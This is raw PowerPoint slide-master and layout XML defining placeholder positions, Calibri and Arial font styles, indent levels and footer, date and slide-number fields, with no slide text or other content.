          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="776288" y="404813"/>
            <a:ext cx="8505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2051" name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE7B53F1-7D5C-7341-BE50-34F8758E8A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="744538" y="1352550"/>
            <a:ext cx="8569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C6ED4878-0A91-044B-BA60-60D57EB9AEFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="715291" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECAAF066-5528-EA4C-9218-A279C8FD1D6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="715291" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A4693E49-81F5-D34E-B123-7A5FEABFB3BE}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E274C21-1539-CB42-A709-7B687AFA96AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="276225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="714375" eaLnBrk="1" hangingPunct="1">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9F6A3C0B-47FA-D04C-B172-94CA3C3C746D}"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798" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="913596" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1370394" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1827192" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri"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355600" indent="101600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="712788" indent="201613" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1071563" indent="300038" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1428750" indent="400050" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1788228">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2145874">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2503520">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2861166">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1pPr marL="0">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="357645">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="715291">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1072936">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1430582">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1788228">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2145874">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2503520">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2861166">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Holder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F55474C2-0D03-574B-BD81-918299843FF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="776288" y="404813"/>
            <a:ext cx="8505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075" name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D06EBC9-AF7A-304D-8E9A-E66D9D6868B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="744538" y="1352550"/>
            <a:ext cx="8569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EE8F7590-0ABC-EB4E-9A97-E23D0D5BB10D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="220662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="715711" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B2E9CC-4628-1747-B03A-C56D776CF897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="220662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="715711" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F649D118-DFBB-5943-B2E1-0354EBDD0FEE}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A952692-8F88-1246-876B-6B46F3E8DC83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7242175" y="7227888"/>
            <a:ext cx="2312988" cy="220662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="714375" eaLnBrk="1" hangingPunct="1">
              <a:defRPr sz="1400">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{791F8500-6D51-7842-8E24-E6527F46D1D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798" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="913596" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1370394" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1827192" algn="ctr" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Calibri"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355600" indent="101600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="714375" indent="200025" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1071563" indent="300038" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1430338" indent="398463" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1789277">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2147133">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2504989">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="2862844">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:bodyStyle>
    <p:otherStyle>
      <a:lvl1pPr marL="0">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="357855">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="715711">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1073566">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1431422">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="1789277">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2147133">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="2504989">
        <a:defRPr>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="286284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Holder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC46A0F8-3C18-934E-970C-8E50B62E5BB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2487613" y="257175"/>
            <a:ext cx="50831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 name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE631FB6-78C3-F342-AB73-C0E2AD152985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="1998663"/>
            <a:ext cx="8140700" cy="608012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3950" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="5E5E5E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E94EC97A-DEB4-6149-BD3E-1E9B094B5F32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3419475" y="7227888"/>
            <a:ext cx="3219450" cy="139700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr sz="901">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D60D1017-7FBF-254E-BEF6-0B5C917F6149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503238" y="7227888"/>
            <a:ext cx="2312987" cy="139700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="457474" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
